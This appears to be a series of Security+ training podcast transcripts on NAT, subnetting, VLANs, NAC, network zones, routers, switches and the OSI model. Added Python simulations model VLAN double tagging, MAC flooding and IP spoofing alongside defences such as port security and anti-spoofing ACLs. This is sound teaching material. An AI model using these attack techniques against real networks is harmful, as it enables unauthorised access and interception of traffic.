Hello everyone, my name is vijay kumar Devireddy and I am glad to have you back on my episode 56. Today we are discussing Network Address Translation. Network Address Translation, or NAT, is the process of changing an IP address while it transits across a router. Now, in Network+ we discussed how this was used because we wanted to conserve public IP addresses, since they are limited in IPv4. In Security+, though, we gain an additional benefit when we use NAT: we can actually hide our internal network from attackers. Now, the most commonly used type of NAT is what we call Port Address Translation, or PAT. This is where we have a single public IP address assigned to the router and all of the private IP addresses are assigned to the hosts inside. In your small office home office network, this is most likely what you are using. When a host wants to communicate out over the WAN, it sends the request to the router, and the router forwards the request out to the internet, to the server it's trying to reach, on behalf of the host. When it does this, it keeps track of the translation it made by assigning a unique high port number to each connection, and it uses that port number to match each reply coming back to the inside host that requested it.

This means that if an attacker is looking at your network from the outside, they are only going to see that single public IP address of the router. They are not going to see that you have one, five, ten or 100 hosts inside your network, and they are not going to be able to tell exactly how many devices there are or what kind they are. So, for the Security+ exam, in addition to knowing about NAT and PAT, you should remember that there are public and private IP scopes. You should have learned the private IP ranges back in A+ and Network+, but if you didn't, here is a quick review. The Class A private range is anything that starts with a 10, so 10.0.0.0 all the way up through 10.255.255.255. The Class B private range runs from 172.16.0.0 through 172.31.255.255, essentially anything that starts with 172.16 up through 172.31. The Class C private range is really easy to remember as well, and it's probably what you are using at home: 192.168.0.0 all the way up to 192.168.255.255. So if it starts with 192.168, it is also a private IP address. Remember, private IP addresses cannot be routed over the internet. So instead, once a packet hits your external router, the router uses NAT or PAT to give it a public IP address and port number to send the information out to the internet and to receive the reply back.
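The following is an added example, not code from the episode, that models the PAT table the router keeps. It assumes a hypothetical router with public address 198.51.100.1 and two inside hosts that both happen to use the same source port; the router gives each connection its own public port, routes the replies back by that port, and drops an unsolicited inbound packet for which no translation exists, which is why an outsider only ever sees the one public address. The private-range check uses the three ranges named above.

```python
import ipaddress

# The three RFC 1918 private ranges named in the episode.
PRIVATE_RANGES = [ipaddress.ip_network(n)
                  for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_private(ip: str) -> bool:
    """True for addresses that can never be routed on the public internet."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in PRIVATE_RANGES)

class PatRouter:
    """Port Address Translation: many inside hosts share one public IP. Each
    outbound connection gets its own public source port, which the router
    remembers so it can deliver the reply to the right inside host."""
    def __init__(self, public_ip: str, first_port: int = 49152):
        self.public_ip = public_ip
        self.next_port = first_port
        self.out_table = {}  # (inside_ip, inside_port, dst_ip, dst_port) -> public_port
        self.in_table = {}   # (public_port, dst_ip, dst_port) -> (inside_ip, inside_port)

    def outbound(self, src_ip, src_port, dst_ip, dst_port):
        """Rewrite the source of a packet leaving the LAN; returns the new 4-tuple."""
        if not is_private(src_ip):
            raise ValueError(f"{src_ip} is not an inside address")
        key = (src_ip, src_port, dst_ip, dst_port)
        if key not in self.out_table:
            public_port = self.next_port
            self.next_port += 1
            self.out_table[key] = public_port
            self.in_table[(public_port, dst_ip, dst_port)] = (src_ip, src_port)
        return (self.public_ip, self.out_table[key], dst_ip, dst_port)

    def inbound(self, src_ip, src_port, dst_port):
        """Rewrite the destination of a packet arriving at the public IP.
        Packets with no matching translation are dropped (None)."""
        inside = self.in_table.get((dst_port, src_ip, src_port))
        if inside is None:
            return None
        return (src_ip, src_port, inside[0], inside[1])

def run_scenario():
    router = PatRouter("198.51.100.1")                   # constructed public IP
    a = router.outbound("192.168.1.10", 51000, "203.0.113.80", 443)
    b = router.outbound("192.168.1.11", 51000, "203.0.113.80", 443)  # same inside port
    reply_a = router.inbound("203.0.113.80", 443, a[1])
    reply_b = router.inbound("203.0.113.80", 443, b[1])
    scan = router.inbound("192.0.2.9", 40000, a[1])       # unsolicited probe at that port
    return {"a": a, "b": b, "reply_a": reply_a, "reply_b": reply_b, "scan": scan}

if __name__ == "__main__":
    for label, value in run_scenario().items():
        print(label, value)
```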

Jul 09, 2021 (10:59)
Subnetting a way of using IP address more efficiently...

Hello everyone, my name is vijay kumar Devireddy and I am glad to have you back on my episode 55. Today we are discussing subnetting. Subnetting is the act of creating subnetworks logically through the manipulation of IP addresses. So if I take a large chunk of IPs, like a block of 256, I can break it down into four blocks of 64 IPs, or eight blocks of 32 IPs, however you want to break it down, which you learned back in Network+. Now, subnetting has some benefits for our network. First, it allows us to use the IP address space we've been given more efficiently, and it reduces broadcast traffic and the number of collisions, because there are fewer hosts on any given network. But it also increases our security by making our networks more compartmentalized, splitting them into smaller sections. Any time information wants to go from one subnet to another, it has to be routed, and that gives us an additional place to put access control lists and other controls on our router for additional security. You can use subnets to help secure your network in a couple of ways. First, assign different policies to each subnet. For example, I might have a subnet for my printers, and those have different policies than the subnet for my servers, which in turn has different policies than the subnet for my office workers' desktop computers. Each subnet can have its own policy.

Also, you want to monitor all of your subnets and check the traffic that's going into and out of them. By using subnets we can help contain an attack as well, because all traffic has to be routed before it can enter or exit a subnet. So if somebody breaks into, say, the secretary's computer, they're going to be stuck in that subnet unless they have permission to go into some of the other, more secured subnets we have. Each time traffic goes through the router it's checked against the access control list, and the secretary's laptop may not have access to the database server, for example, which holds more confidential information. So the attacker is limited in what they can do once they've broken in.
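Here is an added example, written for this page rather than taken from the episode, that carves a /24 into four /26 subnets with Python's `ipaddress` module and then models the router ACL between them. The zone names, addresses and ports are hypothetical. It also shows the caveat the paragraph implies: traffic between two hosts in the same subnet never crosses the router, so the ACL only helps once the hosts are in different subnets.

```python
import ipaddress

def carve(block: str, new_prefix: int):
    """Split one block into equal subnets, e.g. a /24 of 256 addresses into four /26s of 64."""
    return list(ipaddress.ip_network(block).subnets(new_prefix=new_prefix))

# Hypothetical design: one /24 carved into four /26 zones with different policies.
ZONES = {
    "office":   ipaddress.ip_network("10.0.1.0/26"),
    "printers": ipaddress.ip_network("10.0.1.64/26"),
    "servers":  ipaddress.ip_network("10.0.1.128/26"),
    "database": ipaddress.ip_network("10.0.1.192/26"),
}

# Router ACL between zones: (source zone, destination zone, destination port or None, action).
# First match wins; anything not listed is denied.
ACL = [
    ("office",  "printers", 9100, "allow"),   # print jobs only
    ("office",  "servers",  443,  "allow"),   # web front end only
    ("servers", "database", 5432, "allow"),   # only the app tier reaches the database
]

def zone_of(ip: str):
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return None

def crosses_router(src_ip: str, dst_ip: str) -> bool:
    """Traffic inside one subnet is switched at layer 2 and never sees the ACL."""
    return zone_of(src_ip) != zone_of(dst_ip)

def permitted(src_ip: str, dst_ip: str, dst_port: int) -> bool:
    if not crosses_router(src_ip, dst_ip):
        return True          # same subnet: the router is not in the path
    src_zone, dst_zone = zone_of(src_ip), zone_of(dst_ip)
    for s, d, port, action in ACL:
        if s == src_zone and d == dst_zone and (port is None or port == dst_port):
            return action == "allow"
    return False             # implicit deny

if __name__ == "__main__":
    print([str(n) for n in carve("10.0.1.0/24", 26)])
    print("office -> database:", permitted("10.0.1.5", "10.0.1.200", 5432))
    print("servers -> database:", permitted("10.0.1.130", "10.0.1.200", 5432))
```

The compromised "secretary" host at 10.0.1.5 cannot reach the database on 5432, but it can still talk freely to 10.0.1.6 in its own subnet, which is the argument for putting anything sensitive in a separate subnet rather than relying on the ACL alone.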


Jul 08, 2021 (07:57)
Virtual Local Area Networks (VLANS)

Hello everyone, my name is vijay kumar Devireddy and I am glad to have you back on my episode 54. Today we are discussing VLANs. Switches can also provide the ability to create virtual local area networks. This adds a layer of separation to our networks without requiring us to buy additional switches that have to be configured and installed. VLANs are implemented to segment our network, reduce collisions, organize our networks, boost performance and increase security. Unfortunately, attackers have come up with VLAN hopping, which allows them to break out of their VLAN and access other VLANs' data. There are a couple of mechanisms to do this. The first method is known as switch spoofing. In this attack, an attacker configures their device to pretend that it's a switch, connects to a switch port, negotiates a trunk link, and then has access to every VLAN carried on that trunk. To prevent this, disable Dynamic Trunking Protocol, or DTP, on all your switch ports, explicitly configure each port as either an access port or a trunk port instead of letting it negotiate, place all your unplugged ports into an unused VLAN, and avoid the default VLAN. The second method is known as double tagging. When a frame arrives on a trunk, the switch reads the outermost VLAN tag, strips it off and forwards the frame into that VLAN. In double tagging, an attacker adds two VLAN tags, an outer tag and an inner tag. The outer tag matches the native VLAN of the trunk, which is carried untagged, so as the frame goes through the first switch that switch removes the outer tag and sends the frame across the trunk; the next switch sees only the inner tag and delivers the frame into that VLAN, one the attacker should not be able to reach. You can prevent this by moving all the ports out of the default VLAN. Double tagging can also be prevented by upgrading your switch's firmware, using an unused VLAN as the native VLAN on your trunks (or tagging the native VLAN), and redesigning your VLAN structure.
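To show why the native VLAN matters, here is an added example (not code from the episode) that builds real 802.1Q tag headers in Python and models the two switch behaviours the attack relies on: an access port accepting a frame whose outer tag matches its own VLAN, and a trunk sending native-VLAN frames untagged. The MAC addresses, VLAN numbers and the simplified access-port rule are assumptions for the demo; the tag layout (TPID 0x8100 followed by a 16-bit TCI whose low 12 bits are the VLAN ID) is the real one.

```python
import struct
from typing import Optional

TPID = 0x8100   # 802.1Q tag protocol identifier

def build_frame(dst_mac: bytes, src_mac: bytes, vids, ethertype=0x0800, payload=b"") -> bytes:
    """Ethernet frame with zero or more stacked 802.1Q tags (outermost first)."""
    frame = dst_mac + src_mac
    for vid in vids:
        frame += struct.pack("!HH", TPID, vid & 0x0FFF)   # PCP/DEI bits left zero
    return frame + struct.pack("!H", ethertype) + payload

def read_tags(frame: bytes):
    """Returns the list of VLAN IDs in the frame, outermost first."""
    vids, off = [], 12
    while struct.unpack_from("!H", frame, off)[0] == TPID:
        vids.append(struct.unpack_from("!H", frame, off + 2)[0] & 0x0FFF)
        off += 4
    return vids

def strip_outer_tag(frame: bytes) -> bytes:
    return frame[:12] + frame[16:]

def access_ingress(port_vlan: int, frame: bytes) -> Optional[bytes]:
    """Modelled access-port rule: an untagged frame, or one whose outer tag equals
    the port's own VLAN, is accepted into that VLAN; anything else is dropped."""
    vids = read_tags(frame)
    if vids and vids[0] != port_vlan:
        return None
    return frame

def trunk_egress(vlan: int, frame: bytes, native_vlan: int, tag_native: bool) -> bytes:
    """Send a frame belonging to `vlan` out of an 802.1Q trunk. Frames in the
    native VLAN go out untagged unless the switch is set to tag the native VLAN."""
    vids = read_tags(frame)
    send_untagged = (vlan == native_vlan and not tag_native)
    if vids and vids[0] == vlan:                      # already carries its VLAN tag
        return strip_outer_tag(frame) if send_untagged else frame
    if send_untagged:                                 # untagged frame in native VLAN
        return frame
    return frame[:12] + struct.pack("!HH", TPID, vlan) + frame[12:]

def trunk_ingress(frame: bytes, native_vlan: int) -> int:
    """The far switch decides which VLAN a frame from the trunk belongs to."""
    vids = read_tags(frame)
    return vids[0] if vids else native_vlan

def double_tag_attack(outer_vid: int, port_vlan: int, native_vlan: int,
                      tag_native: bool, target_vlan: int) -> Optional[int]:
    """Attacker on an access port in `port_vlan` sends a frame tagged
    [outer_vid, target_vlan]. Returns the VLAN the far switch delivers it into,
    or None if the first switch drops it at the access port."""
    frame = build_frame(b"\xff" * 6, b"\x02\x00\x00\x00\x00\x01",
                        [outer_vid, target_vlan], payload=b"hop")
    admitted = access_ingress(port_vlan, frame)
    if admitted is None:
        return None
    on_trunk = trunk_egress(port_vlan, admitted, native_vlan, tag_native)
    return trunk_ingress(on_trunk, native_vlan)

if __name__ == "__main__":
    print("native VLAN 1, untagged:", double_tag_attack(1, 1, 1, False, 20))
    print("native VLAN 999:       ", double_tag_attack(1, 1, 999, False, 20))
    print("native VLAN tagged:    ", double_tag_attack(1, 1, 1, True, 20))
```

With the attacker in VLAN 1 and VLAN 1 as the untagged native VLAN, the frame lands in VLAN 20. Moving the native VLAN to an unused number, tagging the native VLAN, or keeping user ports out of the native VLAN each leave the outer tag in place, so the far switch delivers the frame back into the attacker's own VLAN.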


Jul 07, 2021 (10:17)
Network Access Control (NAC) Rules that we set for a Network....

Hello everyone, my name is vijay kumar Devireddy and I am glad to have you back on my episode 53. Today we are discussing Network Access Control. Network Access Control, or NAC, is used to protect your network from both known and unknown devices. With NAC, a device is scanned to determine its current security state before it is allowed access to your network. NAC can be used for computers within your internal network that are physically located in your buildings and plugged into it, or it can be applied to devices that connect to your network remotely through a VPN. When a device attempts to connect to the network, it's placed into a virtual holding area while it's being scanned. The device can be checked for a number of different factors, including whether its antivirus definitions are up to date, the status of its security patching, and other items that might introduce security threats into the network if you allowed it to connect. If a device passes this examination, it's allowed to enter and receives access to all of the organizational resources provided by your network. If the device fails the inspection, though, it's instead placed into a digital quarantine area, where it awaits remediation. While it's in this area, the device can receive its antivirus updates, its operating system patches, and any other security configurations and services it needs.

But it can't logically communicate with other portions of the network. That's why it's been placed in quarantine. Like a bad child, the device has been put in time out until it can be rehabilitated and meet the requirements of the initial NAC examination. Once it meets those requirements, it's moved into the network and again receives full access to your organizational resources. Now, NAC solutions can run using either persistent or non-persistent agents. A persistent agent is a piece of software that's installed on the device requesting access to the network. This works well in a corporate environment, because the organization owns all the devices and controls their software baselines, but it doesn't work well in an environment where people bring their own devices. For that you might want to use a non-persistent agent instead. Non-persistent agent solutions were developed for, and are very popular on, college campuses where people bring their own devices in. These solutions require the users to connect to the network, usually over Wi-Fi, and then go to a web-based portal to log in and click a link. That link downloads an agent onto their computer, which scans the device for compliance and deletes itself from the user's machine once it's done. Network Access Control can be offered as a hardware or a software solution. One of the most commonly used Network Access Control mechanisms is the IEEE 802.1X standard, which is used for port-based Network Access Control. Most NAC is actually built on top of this 802.1X standard. We're going to discuss 802.1X in more detail in a future episode, though.


Jul 06, 2021 (15:35)
Types of Network Zones that we use ...

Hello everyone, my name is vijay kumar Devireddy and I am glad to have you back on my episode 52. Today we are discussing network zones. When considering the architecture of your internal network, it's important to consider breaking your network up into multiple security zones. These can be further broken up into sub-zones through the use of subnetting, ACLs, firewall rules, and other isolation methods that help us prevent or shape the flow of data between the different portions of our network. Most networks are segmented into at least three different zones: the LAN, the WAN, and the DMZ. LANs can be secured by using private IPs, by running anti-malware programs, and by placing your clients behind a router and its associated ACLs. WAN connections, on the other hand, should be monitored and firewalled to secure your network against the threats contained within them. The Internet is the world's largest WAN, and traffic crossing the Internet should be tunneled through a virtual private network when you want to keep it safe from prying eyes. This increases your confidentiality. In fact, the TLS tunnel used by an HTTPS connection does much the same job for a single connection: any time you go to a website and see that secure lock, there's an encrypted tunnel between your web browser and the web server you're visiting.

In addition to our LAN and our WAN, the most common security zone we use is what's known as a DMZ, or De-Militarized Zone. This zone is focused on providing controlled access to publicly-available servers that are hosted within your organizational network. For example, if you're self-hosting your web server and email servers inside your organization, it's a best practice to place them within your DMZ, a tightly controlled zone with proper access control rules. This allows you to maintain precise control of the traffic that's allowed between the inside (your LAN), the outside (the WAN), and the DMZ portions of the network. To create a DMZ, multiple interfaces are used on your organization's firewall, a strict set of access control list rules is applied to those interfaces, and each server hosted within your DMZ has to be reachable from the outside, either with its own public IP address or through a translation on the firewall. The purpose of creating security zones like a DMZ is to separate critical assets. Not all devices in your network require the same level of protection. Some resources, such as file servers, contain confidential information like employee data, and these require additional security. Instead of protecting every device to the same high level, we create sub-zones inside our networks based on the level of protection required. In addition to these internal sub-zones, there may also be additional external zones that you need to create, such as an Extranet. An Extranet is a specialized type of DMZ that's created for your partner organizations to access over a wide area network. It acts much like a DMZ, but it's not publicly accessible, and it's placed under additional network monitoring and scrutiny. For example, I access an Extranet every time I need to go to Axelos to order exam vouchers for my students in my ITIL and PRINCE2 courses. It's a part of their network that only their external partners, training partners like us, can access, and not the general public. Conversely, on the other side, we have what's known as an Intranet. An Intranet allows you to extend your internal network across multiple locations within your organization. This is usually done using VPN tunnels. So, for example, I have a couple of employees who work on the other side of the world. If they need to get access to our file servers, they can do that by logging in to our Intranet and reaching it through that secure connection.

Jun 21, 2021 (12:22)
Routers which connect two different Internet Protocol address(I.P.)...

Hello everyone, my name is vijay kumar Devireddy and I am glad to have you back on my episode 51. Today we are discussing routers. While switches operate at layer two of the OSI model, making their decisions based on MAC addresses, routers operate at layer three, making their decisions based on IP addresses. Routers are used to connect two or more networks to form an internetwork, such as when your small office home office router connects your internal network out to the internet. It connects your office's network to other offices' networks over the internet. Routers make routing decisions using IP addresses. These layer three IP addresses are used to determine what network a particular host is on and what path the traffic should take across the wide area network until it reaches its destination network. Once the traffic reaches the destination network, the final router involved conducts an ARP broadcast to locate the correct host on its local network and passes the traffic to it using its MAC address, the layer two address that's also known as the physical address. In addition to this important routing function, routers also provide us with some security functions. Access control lists, or ACLs, can be configured on a router's interfaces to control the flow of traffic into or out of a certain part of the network. ACLs are an ordered set of rules that either permit or deny traffic based on certain characteristics, like its source or destination IP address, the source or destination port number, and the application or service being used. Now, in an effort to get past these access control lists, attackers will often conduct IP spoofing.

If they can forge a source IP address that's on the approved list, they can trick the access control list into letting them in or out. Since routers sit on the external interface of a network, they're commonly a target for attack as well, and out of the box routers tend to be very insecure, so you need to configure them properly for security. This includes changing things like the default username and password, changing the default routing tables, and changing the default internal IP addresses. To help protect our routers and our internal networks, we use a lot of other network devices and technologies, such as firewalls, intrusion prevention systems, virtual private network connections, content filters, and access control lists. By layering all these defenses, we create a better defense-in-depth posture. We're going to cover all of these protective devices and technologies throughout this course, but for now it's sufficient to realize that using these things adds to our security and helps secure our routers from various attack methods.
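The spoofing problem above has a standard answer on the router: an ingress filter on the WAN interface that denies any packet claiming an inside source address, placed before the "trusted inside hosts" rules (the BCP 38 idea). This added example, not code from the episode, evaluates an ordered ACL in Python over a hypothetical 10.10.0.0/16 internal range, a hypothetical management host and DMZ, and shows the same spoofed packet passing a weak ACL and failing the hardened one.

```python
import ipaddress

def net(cidr: str):
    return ipaddress.ip_network(cidr)

# Hypothetical address plan for the demo.
INTERNAL = net("10.10.0.0/16")      # everything inside the router
MGMT = net("10.10.0.5/32")          # management host reachable on SSH
DMZ_WEB = net("10.10.20.0/24")      # public web servers
ANY = net("0.0.0.0/0")

# ACL entries: (source network, destination network, destination port or None, action).
# Evaluated top to bottom on packets arriving on the WAN interface; first match
# wins and there is an implicit deny at the end.
WEAK_WAN_IN = [
    (INTERNAL, MGMT, 22, "allow"),      # "inside hosts may SSH to management"
    (ANY, DMZ_WEB, 443, "allow"),
]

# Anti-spoofing: a packet arriving from the WAN can never legitimately carry an
# inside source address, so deny those before any rule that trusts inside sources.
HARDENED_WAN_IN = [(INTERNAL, ANY, None, "deny")] + WEAK_WAN_IN

def evaluate(acl, src_ip: str, dst_ip: str, dst_port: int) -> bool:
    """Returns True if the ACL permits the packet."""
    src, dst = ipaddress.ip_address(src_ip), ipaddress.ip_address(dst_ip)
    for src_net, dst_net, port, action in acl:
        if src in src_net and dst in dst_net and (port is None or port == dst_port):
            return action == "allow"
    return False

def spoofing_test():
    """Attacker on the WAN forges an inside source to reach SSH on the management host."""
    forged = ("10.10.0.99", "10.10.0.5", 22)
    return {"weak": evaluate(WEAK_WAN_IN, *forged),
            "hardened": evaluate(HARDENED_WAN_IN, *forged)}

if __name__ == "__main__":
    print(spoofing_test())
```

The order matters: the same deny entry appended at the bottom of the list would never be reached, because the first rule already matched the forged source. The deny must sit above every rule that trusts internal addresses.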



Jun 11, 2021 (08:59)
Switches which work at Data link Layer of OSI Model...

Hello everyone, my name is vijay kumar Devireddy and I am glad to have you back on my episode 50. Today we are discussing switches. Hubs were originally used to connect devices on a network. All of the devices were connected to a hub, and any time something came into one port of the hub, it was repeated out all of the other ports. This was known as a broadcast. Hubs were dumb; they had no intelligence. As networks got larger, hubs caused a lot of collisions and slowed down the network. To solve this problem, something came along called a bridge, which was used to separate a physical LAN into two logical networks, or to connect two logical networks together. Switches are the evolution of hubs and bridges. Essentially, every single port on a switch acts as if it were its own bridged segment. This improves data transfer and security through the intelligent use of MAC addresses: the switch figures out which port a device is on and sends a frame out only that port, ignoring the rest. This reduces traffic and increases security.

Switches are subject to three main types of attack, though: MAC flooding, MAC spoofing, and physical tampering. Each of these tries to overcome the logic and intelligence the switch has. MAC flooding is an attempt to overwhelm the limited switch memory that's set aside to store the MAC addresses learned on each port, known as the content addressable memory, or CAM table. If a switch's CAM table is flooded full of bogus addresses, it can fail open and start acting like a hub, broadcasting data out every single port. This can cause confidentiality to be breached inside your local network, because the attacker now receives traffic that was meant for other hosts. MAC spoofing, on the other hand, occurs when an attacker changes their own MAC address to pretend to be some other machine on the network. For example, wireless access points may use MAC filtering to prevent unknown devices from joining the wireless network. They do this by looking at the MAC address being reported, and if it's not in their access control list, they block it from connecting. Now, if I switch my MAC address to that of a known or allowed device, I can gain access to that network by spoofing: I pretend that I am an authorized device using a known good MAC address, and I pass right through that ACL. MAC spoofing is also sometimes combined with ARP spoofing. ARP, the Address Resolution Protocol, is how hosts on a network learn which MAC address belongs to which IP address. Attackers often combine a MAC spoof with an ARP spoof so that they appear to be the destination somebody is trying to send information to, and use that to intercept the information. To prevent this, configure port security on your switch so that each port only accepts a limited number of, or specific static, MAC addresses, limit how long an ARP entry is cached on a host, and use dynamic ARP inspection to check that the ARP traffic on the network matches the known IP-to-MAC bindings. The third way to defeat a switch is physical tampering. Physical tampering occurs when an attacker gains physical access to the switch, because if you can touch a device, you can pretty much configure it to do whatever you want. To prevent physical tampering, the switch should be locked up in a network rack or a network closet, behind closed doors, with that room secured using good physical security practices.
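To show the fail-open behaviour and the port-security countermeasure side by side, here is an added example (written for this page, not code from the episode or any switch vendor) that models a switch's CAM table in Python. The tiny table size, the port numbers, the MAC addresses and the err-disable reaction are all constructed for the demo; real switches hold thousands of entries and the attacker sprays correspondingly more frames.

```python
class Switch:
    """Toy layer-2 switch: learns source MACs into a CAM table of limited size and
    forwards known destinations out one port. Unknown destinations are flooded out
    every other port, which is exactly what a MAC flooding attack exploits."""
    def __init__(self, ports, cam_capacity, port_security_max=None):
        self.ports = list(ports)
        self.capacity = cam_capacity
        self.max_per_port = port_security_max      # None = port security off
        self.cam = {}                              # mac -> port
        self.learned = {p: set() for p in self.ports}
        self.err_disabled = set()

    def receive(self, in_port, src_mac, dst_mac):
        """Process one frame; returns the set of ports it is sent out of."""
        if in_port in self.err_disabled:
            return set()
        if src_mac not in self.cam:
            if (self.max_per_port is not None
                    and len(self.learned[in_port]) >= self.max_per_port):
                self.err_disabled.add(in_port)     # port-security violation: shut the port
                return set()
            if len(self.cam) < self.capacity:      # else: table full, cannot learn
                self.cam[src_mac] = in_port
                self.learned[in_port].add(src_mac)
        out_port = self.cam.get(dst_mac)
        if out_port is None or out_port == in_port:
            return {p for p in self.ports if p != in_port}   # flood: fail-open behaviour
        return {out_port}

def run_scenario(port_security_max=None):
    """Victim A on port 1, victim B on port 2, attacker on port 3. Returns the ports
    a unicast frame from A to B reaches and whether the attacker's port was shut."""
    sw = Switch(ports=[1, 2, 3, 4], cam_capacity=8, port_security_max=port_security_max)
    A, B, BCAST = "aa:aa:aa:aa:aa:aa", "bb:bb:bb:bb:bb:bb", "ff:ff:ff:ff:ff:ff"
    sw.receive(1, A, BCAST)                                 # A is learned normally
    for i in range(20):                                     # attacker sprays bogus sources
        sw.receive(3, f"02:00:00:00:00:{i:02x}", BCAST)
    sw.receive(2, B, BCAST)                                 # B tries to get learned
    delivered = sw.receive(1, A, B)                         # A sends a private frame to B
    return delivered, 3 in sw.err_disabled

if __name__ == "__main__":
    print("no port security:", run_scenario())
    print("max 2 MACs/port: ", run_scenario(port_security_max=2))
```

Without port security the attacker fills the table before B is learned, so A's frame to B is flooded to every port, including the attacker's. With a two-address limit on port 3, the third bogus source err-disables that port, B is learned normally, and the frame goes only to port 2.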

Jun 09, 2021 (14:31)
OSI model this is how two devices can talk...

Hello everyone, my name is vijay kumar Devireddy and I am glad to have you back on my episode 49. Today we are discussing the OSI Model. The Open Systems Interconnection, or OSI, Model is used to explain how network communications occur between a host and a remote device over a local area network, or LAN. The OSI Model is very useful to help us categorize the different communication protocols that are used in networks, and it gives us a common lexicon we can use to describe the functions of different devices. You probably remember the mnemonic Please Do Not Throw Sausage Pizza Away. This represents the seven layers of the OSI Model, going from the bottom to the top: Physical, Data Link, Network, Transport, Session, Presentation, and Application. The first layer is the Physical layer. This layer represents the actual network cables and radio waves that are used to carry data over a network. Data carried at the Physical layer is known as bits, and they can be electrical signals, light pulses or radio waves. Examples of things that operate at layer one, the Physical layer, are our network cables, whether they're fiber optic, copper or coaxial, radio waves like Wi-Fi and Bluetooth, and hubs and repeaters, which are dumb devices that simply take input in and repeat it out the other side. Our second layer is the Data Link layer. This layer describes how a connection is established, maintained and transferred over the physical layer. Addressing here is done using physical addresses, like MAC addresses. At this layer the bits are grouped into frames and then sent over the network. Examples of things that operate at layer two, the Data Link layer, include MAC addresses, switches and bridges. Bridges were an earlier device that later evolved into switches. Switches use MAC addresses as their form of physical addressing. This allows a switch to decide where to send a frame based on the MAC address it's addressed to, so it's smarter than a hub because it decides where that particular frame goes instead of just repeating it out every port it has.

Now, as we move up the ladder we get to the third layer, which is the Network layer. This is the layer where logical addressing is performed, and this includes routing information between hosts, networks and internetworks. The unit of data at this layer is the packet: a packet carries the logical addresses, and the Data Link layer wraps it inside a frame to carry it across each link, so as we move up the layers we talk about bits, then frames, then packets. Examples at this layer include IP addresses, which tell us where a packet is going to be sent over our network; layer three switches, which in add ition to using MAC addresses can make decisions using IP addresses; and of course routers, which are by far the most common layer three device, because they're used to connect all of our networks together around the world. Our fourth layer is the Transport layer. This layer manages and ensures the transmission of the packets from the host to the destination. It uses either TCP, which is a connection-oriented protocol, or UDP, which is a connectionless protocol. You might remember from Network+ that TCP has a three-way handshake: hey, I'm ready to send you something; okay, I'm ready to receive something; all right, let's start sending it. And then they send the information.
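The layering described above is easiest to see by building and then decoding a real frame. This added example, not code from the episode, wraps a few bytes of application data in a TCP header (layer 4), an IPv4 header with a correct header checksum (layer 3) and an Ethernet II header (layer 2), then peels the layers back off and rejects a packet whose header was tampered with. The addresses, ports and payload are constructed; the header layouts and the RFC 791 checksum are the real ones, except that the TCP checksum is left at zero to keep the example short.

```python
import socket
import struct

SYN = 0x02

def ipv4_checksum(header: bytes) -> int:
    """RFC 791 one's-complement checksum; verifying a valid header yields 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def mac_bytes(mac: str) -> bytes:
    return bytes(int(part, 16) for part in mac.split(":"))

def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)

def build_frame(src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port,
                payload=b"", flags=SYN) -> bytes:
    """Encapsulate top-down: payload -> TCP segment -> IPv4 packet -> Ethernet frame."""
    # Layer 4: 20-byte TCP header, no options, checksum left at zero in this model
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, 0, 0, 5 << 4, flags,
                      65535, 0, 0) + payload
    # Layer 3: 20-byte IPv4 header, TTL 64, protocol 6 (TCP); compute the checksum
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                         socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip_hdr = ip_hdr[:10] + struct.pack("!H", ipv4_checksum(ip_hdr)) + ip_hdr[12:]
    # Layer 2: Ethernet II header with EtherType 0x0800 (IPv4)
    eth = mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", 0x0800)
    return eth + ip_hdr + tcp

def decode(frame: bytes) -> dict:
    """Peel the frame apart bottom-up: MACs at layer 2, IPs at layer 3, ports at 4."""
    dst_mac, src_mac = frame[:6], frame[6:12]
    if struct.unpack("!H", frame[12:14])[0] != 0x0800:
        raise ValueError("not an IPv4 packet")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                      # header length in bytes
    if ipv4_checksum(ip[:ihl]) != 0:
        raise ValueError("IPv4 header checksum mismatch")
    (_, _, total_len, _, _, ttl, proto, _, src, dst) = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    if proto != 6:
        raise ValueError("not TCP")
    seg = ip[ihl:total_len]
    sport, dport, _, _, off, flags, _, _, _ = struct.unpack("!HHIIBBHHH", seg[:20])
    return {
        "layer2": {"src_mac": mac_str(src_mac), "dst_mac": mac_str(dst_mac)},
        "layer3": {"src_ip": socket.inet_ntoa(src), "dst_ip": socket.inet_ntoa(dst), "ttl": ttl},
        "layer4": {"src_port": sport, "dst_port": dport, "syn": bool(flags & SYN)},
        "payload": seg[(off >> 4) * 4:],
    }

if __name__ == "__main__":
    f = build_frame("00:11:22:33:44:55", "66:77:88:99:aa:bb",
                    "192.168.1.10", "203.0.113.80", 51234, 443, b"GET")
    print(decode(f))
```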

Jun 06, 2021 (16:47)
A Short intro for Network the ins and outs of it....

Hello everyone, my name is vijay kumar Devireddy and I am glad to have you back on my episode 48. In this episode, we're going to talk about some of the different devices that make up our networks and some of the different attacks that are used against them. But before we do that, we're going to quickly cover the basics of networks by going through the OSI model. In this section of the course we're going to do this as a quick review, because you should have already learned the OSI model and the basics of networking. If you haven't, the information contained in that curriculum is really important to understand, so that you can better understand the security we're talking about throughout this week.



Jun 05, 2021 (08:03)
What is Structured Query Language(SQL) Injection ?

Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 47. Today we are discussing SQL injection. What is SQL? SQL, or Sequel, stands for Structured Query Language, and it is the way a web application communicates with a database server to ask for information. Because this is the language used to talk to databases, and databases hold lots of valuable information, it has become a popular target for attacks. That brings us to the concept of an SQL injection, which is an attack consisting of the insertion, or injection, of SQL through input data that the client sends to the web application (a form field, a URL parameter, a cookie), so that the input ends up being interpreted as part of the query.

